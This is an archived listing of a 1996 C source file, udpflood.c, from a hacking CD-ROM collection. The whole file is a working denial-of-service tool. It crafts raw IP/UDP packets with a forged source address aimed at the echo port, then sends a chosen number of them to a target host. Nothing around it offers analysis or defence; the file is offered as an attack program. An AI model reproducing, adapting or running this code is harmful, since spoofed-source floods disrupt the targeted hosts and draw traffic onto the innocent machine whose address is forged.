home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / hacking / virriiorg / udpflood.c < prev    next >
Encoding:
C/C++ Source or Header  |  1996-04-23  |  1.8 KB  |  96 lines

  1. #include<sys/types.h>
  2. #include<sys/socket.h>
  3. #include<netinet/in_systm.h>
  4. #include<netinet/in.h>
  5. #include<netinet/ip.h>
  6. #include<netinet/udp.h>
  7. #include<errno.h>
  8. #include<string.h>
  9. #include<netdb.h>
  10. #include<arpa/inet.h>
  11. #include<stdio.h>
  12.  
  13. struct sockaddr sa;
  14.  
  15. main(int argc,char **argv)
  16. {
  17. int fd;
  18. int x=1;
  19. struct sockaddr_in *p;
  20. struct hostent *he;
  21. int numpackets;
  22. u_char gram[38]=
  23.     {
  24.     0x45,    0x00,    0x00,    0x26,
  25.     0x12,    0x34,    0x00,    0x00,
  26.     0xFF,    0x11,    0,    0,
  27.     0,    0,    0,    0,
  28.     0,    0,    0,    0,
  29.  
  30.     0,    0,    0,    0,
  31.     0x00,    0x12,    0x00,    0x00,
  32.  
  33.     '1','2','3','4','5','6','7','8','9','0'
  34.     };
  35.  
  36. if(argc!=4)
  37.     {
  38.     fprintf(stderr,"usage: %s sourcename destinationname numpackets\n",*argv);
  39.     exit(1);
  40.     };
  41.  
  42. numpackets = atoi(argv[3]);
  43. fprintf(stderr,"Will flood %d times",numpackets);
  44.  
  45. if((he=gethostbyname(argv[1]))==NULL)
  46.     {
  47.     fprintf(stderr,"can't resolve source hostname\n");
  48.     exit(1);
  49.     };
  50. bcopy(*(he->h_addr_list),(gram+12),4);
  51.  
  52. if((he=gethostbyname(argv[2]))==NULL)
  53.     {
  54.     fprintf(stderr,"can't resolve destination hostname\n");
  55.     exit(1);
  56.     };
  57. bcopy(*(he->h_addr_list),(gram+16),4);
  58.  
  59. *(u_short*)(gram+20)=htons((u_short)7);
  60. *(u_short*)(gram+22)=htons((u_short)7);
  61.  
  62. p=(struct sockaddr_in*)&sa;
  63. p->sin_family=AF_INET;
  64. bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
  65.  
  66. if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
  67.     {
  68.     perror("socket");
  69.     exit(1);
  70.     };
  71.  
  72. #ifdef IP_HDRINCL
  73. fprintf(stderr,"\nWe have IP_HDRINCL \n\n");
  74. if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
  75.     {
  76.     perror("setsockopt IP_HDRINCL");
  77.     exit(1);
  78.         };
  79. #else
  80. fprintf(stderr,"\nWe don't have IP_HDRINCL \n\n");
  81. #endif
  82.  
  83. printf("\nNumber of Packets sent:\n\n");
  84. for(x=0;x<numpackets;x++)
  85. {
  86. if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
  87.     {
  88.     perror("sendto");
  89.     exit(1);
  90.     };
  91. printf("%d ",x);
  92. }
  93.  
  94. }
  95.  
  96.